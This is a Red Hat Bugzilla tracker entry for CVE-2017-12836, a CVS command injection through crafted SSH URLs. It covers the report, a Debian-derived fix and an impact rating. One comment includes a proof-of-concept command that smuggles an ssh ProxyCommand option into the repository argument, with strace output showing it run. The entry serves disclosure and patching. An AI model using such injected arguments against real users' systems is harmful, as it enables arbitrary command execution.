Bug 1480800 - (CVE-2017-12836) CVE-2017-12836 cvs: Command injection via malicious ssh URLs
CVE-2017-12836 cvs: Command injection via malicious ssh URLs
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
All Linux
medium Severity medium
: ---
: ---
Assigned To: Red Hat Product Security
: Security
Depends On: 1480801
Blocks: 1480802 1485460
  Show dependency treegraph
Reported: 2017-08-11 18:22 EDT by Adam Mariš
Modified: 2017-08-25 15:38 EDT (History)
1 user (show)

See Also:
Fixed In Version:
Doc Type: If docs needed, set a value
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2017-08-22 09:35:08 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)
Fix ported to 1.11.23 (1.73 KB, patch)
2017-08-14 05:07 EDT, Petr Pisar
no flags Details | Diff

  None (edit)
Description Adam Mariš 2017-08-11 18:22:01 EDT
Command injection vulnerability was found in CVS that can be triggered via malicious SSH URLs.


Comment 1 Adam Mariš 2017-08-11 18:22:23 EDT
Created cvs tracking bugs for this issue:

Affects: fedora-all [bug 1480801]
Comment 2 Petr Pisar 2017-08-14 04:25:32 EDT

$ CVS_RSH=/usr/bin/ssh strace -fq -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada
execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffc55abc638 /* 38 vars */) = 0
[pid 22658] execve("/usr/bin/ssh", ["/usr/bin/ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x9ce03e55c0 /* 40 vars */) = 0
Pseudo-terminal will not be allocated because stdin is not a terminal.
[pid 22659] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x8dbda2340 /* 40 vars */) = 0
[pid 22659] execve("/usr/bin/id", ["id"], 0x26c07faf80 /* 39 vars */) = 0
[pid 22659] +++ exited with 0 +++
[pid 22658] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22659, si_uid=500, si_status=0, si_utime=0, si_stime=1} ---
ssh_exchange_identification: Connection closed by remote host
[pid 22658] +++ exited with 255 +++
[pid 22657] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22658, si_uid=500, si_status=255, si_utime=0, si_stime=1} ---
[pid 22657] +++ exited with 255 +++
--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=22657, si_uid=500, si_status=255, si_utime=0, si_stime=0} ---
cvs [checkout aborted]: end of file from server (consult above messages if any)
+++ exited with 1 +++

Debian's fix for cvs-1.12.14 <https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=871810;filename=cvs_1.12.13%2Breal-9%2Bdeb7u1.debdiff;msg=52> adds "--" right before the $CVS_RSH's hostname argument.
Comment 3 Petr Pisar 2017-08-14 05:07 EDT
Created attachment 1313002 [details]
Fix ported to 1.11.23
Comment 4 Stefan Cornelius 2017-08-15 05:21:08 EDT
We've seen similar flaws in other source code management tools. However, the other tools allowed attackers to hide their attack in an elegant way. I'm not aware of such a method for CVS. Thus, in order to exploit this issue, an attacker would likely have to trick a user into executing a suspect command line.
Comment 5 Stefan Cornelius 2017-08-22 09:35:15 EDT

Red Hat Product Security has rated this issue as having Moderate security impact. This issue is not currently planned to be addressed in future updates. For additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/.

Note You need to log in before you can comment on or make changes to this bug.